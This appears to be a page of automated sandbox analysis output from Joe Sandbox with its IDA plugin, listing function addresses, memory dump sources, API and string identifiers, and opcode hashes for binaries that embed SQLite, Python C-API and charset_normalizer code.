                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                • Opcode ID: 163f402a1fb0e79306561b7d1351dc0227e06d1d27abfb67021ae25e867ac1b0
                                                                                                                                                                                                                • Instruction ID: bbf7b9d9718fdb63ddacc1d417c2408fd0c3a68941acd32a0fc9e070156400a0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 163f402a1fb0e79306561b7d1351dc0227e06d1d27abfb67021ae25e867ac1b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18313D72609BC18AEB689FA0E8503EE7361FB84784F44443ADA5E47A94EF3CD549C711
                                                                                                                                                                                                                Function 00007FF8E68B77C4 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 425COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                                                                                • API String ID: 2221118986-3207396689
                                                                                                                                                                                                                • Opcode ID: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
                                                                                                                                                                                                                • Instruction ID: 7075d73c82fed48ea880a9e9c45825d3ae2912e57b80ce53bf555bbe1e8315c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F1356AB2C3AA85E7618AA8954077E7FE1EB417C4F0C0136DACD476D1DE2CE845CB02
                                                                                                                                                                                                                Function 00007FF8E68BFC70 Relevance: 12.4, APIs: 2, Strings: 6, Instructions: 411COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                • API String ID: 2221118986-463513059
                                                                                                                                                                                                                • Opcode ID: 44512094730ef02586f7467600008db8530935ff935724490f288e676ea215e3
                                                                                                                                                                                                                • Instruction ID: 85512b9ff12eeeca5115881e97ba3f5f3a96febac5b1c7731cb062eca538a1b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44512094730ef02586f7467600008db8530935ff935724490f288e676ea215e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE15A55B2C7DA47EE1C8BB928153782B90AB4A7C0F58513ADEAE477D2DE3CB512C301
                                                                                                                                                                                                                Function 00007FF8E68DD7C0 Relevance: 12.4, APIs: 1, Strings: 7, Instructions: 403COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                • API String ID: 2221118986-741541785
                                                                                                                                                                                                                • Opcode ID: 47e708a9b2cd1ce954ac55090724bb7a2ab165dfa4cac61b29933a9d17c3da3a
                                                                                                                                                                                                                • Instruction ID: 4f9750a37c8561d28fab21a5333b2dc261e2d2d1bc58f812cf1e1ab2dca42d9a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e708a9b2cd1ce954ac55090724bb7a2ab165dfa4cac61b29933a9d17c3da3a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A102AC72F286628AEB10CBA5E4607AD77A9FB84784F14413ADA4E47B94DF7CE440CB11
                                                                                                                                                                                                                Function 00007FF8E68B74B1 Relevance: 9.4, APIs: 2, Strings: 4, Instructions: 403COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                • API String ID: 0-2031831958
                                                                                                                                                                                                                • Opcode ID: fb54a0c179caa17773880983dc6a8eccc5c567f5f9aeb018be3315aa168a96dc
                                                                                                                                                                                                                • Instruction ID: f3912fc38ce2eb4ca3d15b801ee6f314ff9823066087e5dce8145b1723923bc7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb54a0c179caa17773880983dc6a8eccc5c567f5f9aeb018be3315aa168a96dc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF11F66B2C7AA85EB64CB689054B7E7FA4EB85BC4F084035DA8E43795EE3CE401C701
                                                                                                                                                                                                                Function 00007FF8E68D72D0 Relevance: 6.6, APIs: 5, Instructions: 360COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                                • Opcode ID: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
                                                                                                                                                                                                                • Instruction ID: ea5d483db5ed8b1762e72c6f2467805de9a491388c93ab4d77ff2ddc71df9d96
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE1D43272C79186E7909F69D0407AD7BA9FB58BC4F048036EE8E47B85DE3DD4458312
                                                                                                                                                                                                                Function 00007FF8E7142150 Relevance: 45.9, APIs: 13, Strings: 13, Instructions: 440COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Format$DeallocDict_$ContainsItemSequence_Tuple_Unicode_
                                                                                                                                                                                                                • String ID: %.200s%s missing required argument '%U' (pos %d)$%.200s%s missing required keyword-only argument '%U'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%S' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%U') and position (%d)$at least$at most$exactly$function$keyword $this function
                                                                                                                                                                                                                • API String ID: 3590232122-3030676885
                                                                                                                                                                                                                • Opcode ID: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
                                                                                                                                                                                                                • Instruction ID: 6af4367dad05dbe3b1ae7af44cea931b4bd30896c0ad2916973bc0f4b1fff302
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD125D32A09B86C1EA548F85E8807BD77A5FB84BD4F444136EA6E43764EF3CE485D702
                                                                                                                                                                                                                Function 00007FF8E714AE50 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 384COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall$Err_Method$ChainCode_EmptyExceptions1FetchFrame_FromLong_Number_Ssize_tState_Thread
                                                                                                                                                                                                                • String ID: bool$feed$str
                                                                                                                                                                                                                • API String ID: 476165880-2613659865
                                                                                                                                                                                                                • Opcode ID: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
                                                                                                                                                                                                                • Instruction ID: f497a20b6539afa6cf2cdacb5534be53ebf914dd7533273b982825dcef1f53fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D023931A09B83C1EB689F92E8553BD23A2AF45BD4F484031D96D87AA5EF3CE444D743
                                                                                                                                                                                                                Function 00007FF8E7149740 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_$Vectorcall$CompareContainsErr_FormatFromLong_MethodNumber_RichSet_Ssize_tSubtypeType_
                                                                                                                                                                                                                • String ID: bool$feed$set
                                                                                                                                                                                                                • API String ID: 588643045-561237756
                                                                                                                                                                                                                • Opcode ID: 2ce494273f180fa024b86351a584eddda6a252b5bae88b763fbfbb79a573f59b
                                                                                                                                                                                                                • Instruction ID: 8d1bfa7e279511810c72c7b0909ece78c1342611d2a19da7bc8de3c721b5d4fe
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ce494273f180fa024b86351a584eddda6a252b5bae88b763fbfbb79a573f59b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CD14932A08B83C5EB749F95E89537D63A2AF44BD4F484035CA6E4A6A5EF3CE440D703
                                                                                                                                                                                                                Function 00007FF8E7141D70 Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 216stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strchr
                                                                                                                                                                                                                • String ID: %$Empty keyword parameter name$Empty parameter name after $$Invalid format string ($ before |)$Invalid format string ($ specified twice)$Invalid format string (@ specified twice)$Invalid format string (@ without preceding | and $)$Invalid format string (| specified twice)$More keyword list entries (%d) than format specifiers (%d)$more argument specifiers than keyword list entries (remaining format:'%s')
                                                                                                                                                                                                                • API String ID: 2830005266-262724644
                                                                                                                                                                                                                • Opcode ID: 38c6c7fd6f791c59d1b5912cc3173f5b2923cab9302d414a8e120c7176cfda89
                                                                                                                                                                                                                • Instruction ID: da1368f07e73fc5230533bed03835df2b12b2cf59fd83cc7d1f5262c4be19b3d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38c6c7fd6f791c59d1b5912cc3173f5b2923cab9302d414a8e120c7176cfda89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9918D71A09B82C2EB288BA5E44033C67E1FB48BD4F544535CA6D47B94EF7CE496E302
                                                                                                                                                                                                                Function 00007FF8E69616F0 Relevance: 25.7, APIs: 1, Strings: 16, Instructions: 234COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E68FC340: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00007FF8E696738A,?,?,?,?,?,00007FF8E68FC0E2), ref: 00007FF8E68FC4E8
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E68FBE30: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF8E68F653C), ref: 00007FF8E68FBF9A
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E68FBE30: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00007FF8E68F653C), ref: 00007FF8E68FC026
                                                                                                                                                                                                                • memcpy.VCRUNTIME140 ref: 00007FF8E6961A74
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$U$U$Y$Z$Z$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                                                                                                                                                                                • API String ID: 3510742995-2880407920
                                                                                                                                                                                                                • Opcode ID: 5eeb1426e28fcd3045d66288b2d2a9e22e9e9cf39fcaf6444c691318291380f9
                                                                                                                                                                                                                • Instruction ID: d04cf8692e89ce8ddde38c13e8c5c8cf8bb1faadfe87ae24e4798a16e79c8221
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eeb1426e28fcd3045d66288b2d2a9e22e9e9cf39fcaf6444c691318291380f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDB1BE76A29B818AE7209FA4E8583AE37B1FB45798F144235CE9D07799DF3CD058CB01
                                                                                                                                                                                                                Function 00007FF8E7141060 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$List_$Object_$AppendAttrCallErr_FastLookupSliceStringTuple
                                                                                                                                                                                                                • String ID: __mro_entries__ must return a tuple
                                                                                                                                                                                                                • API String ID: 1865160900-2385075324
                                                                                                                                                                                                                • Opcode ID: b039deb2464f2060ae4a0bd026d99ad7f7f16f43939d06b91a08d2db725bb474
                                                                                                                                                                                                                • Instruction ID: d655c2447b587fdfd6226ea7f2556e20c51c7ff8773ca1cf37534ecb3dd874e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b039deb2464f2060ae4a0bd026d99ad7f7f16f43939d06b91a08d2db725bb474
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83514C32A08B42C6EB189FA1E95477D67A2FF45FD5F588031CE2E86654EF3CE441A302
                                                                                                                                                                                                                Function 00007FF8E7143EE0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$AttrDict_Object_String$ClearExceptionItemMatches
                                                                                                                                                                                                                • String ID: __mypyc_attrs__$__mypyc_attrs__ is not a tuple
                                                                                                                                                                                                                • API String ID: 2346549887-4201147154
                                                                                                                                                                                                                • Opcode ID: e66151341709f08fa87d516288480836e991296861bc7efaf3a726328e6597ee
                                                                                                                                                                                                                • Instruction ID: d0082f03f75840e18eb800fb0c57545fad1cc7fe317b76f5e559fc096c119f6d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e66151341709f08fa87d516288480836e991296861bc7efaf3a726328e6597ee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9410525A08B82C2EA598F92E94437D63B1BB48FD4F444035CE6E93B60EF3CE4959703
                                                                                                                                                                                                                Function 00007FF8E6FC2640 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 169COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577585028.00007FF8E6FC0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577691044.00007FF8E6FC3000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577732223.00007FF8E6FC4000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577775069.00007FF8E6FC5000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fc0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _aligned_free$_aligned_malloc_wassertcallocfree
                                                                                                                                                                                                                • String ID: block_len < 256$block_len > 0$src/raw_ctr.c$src/raw_ctr.c
                                                                                                                                                                                                                • API String ID: 592997318-2016502466
                                                                                                                                                                                                                • Opcode ID: 0d5b9b3112169f61a3843e1cf4ad109467cd9809abebe78d90098336cc1026f5
                                                                                                                                                                                                                • Instruction ID: 135aecc36389a5d26b80c7cdddf4442b1c60604a8f165a6697305c4d865a8ee7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d5b9b3112169f61a3843e1cf4ad109467cd9809abebe78d90098336cc1026f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F719236B28B49A6EA60CF55E8407A973A4FB98BC4F544035DE8D43B94DF3CE464C70A
                                                                                                                                                                                                                Function 00007FF8E7153850 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AttrCapsule_DeallocObject_String$Create2Module_
                                                                                                                                                                                                                • String ID: charset_normalizer.md__mypyc.exports$charset_normalizer.md__mypyc.init_charset_normalizer___md$exports$init_charset_normalizer___md
                                                                                                                                                                                                                • API String ID: 2519120496-2411258805
                                                                                                                                                                                                                • Opcode ID: 6cb80ad11c98d76827863cb71e74507b593be2b67b62d800d4c12a6864baf513
                                                                                                                                                                                                                • Instruction ID: e17e7bf3271163b900cefd7545e88a5e09a8db6db65f97c0ca8936f5bba111dd
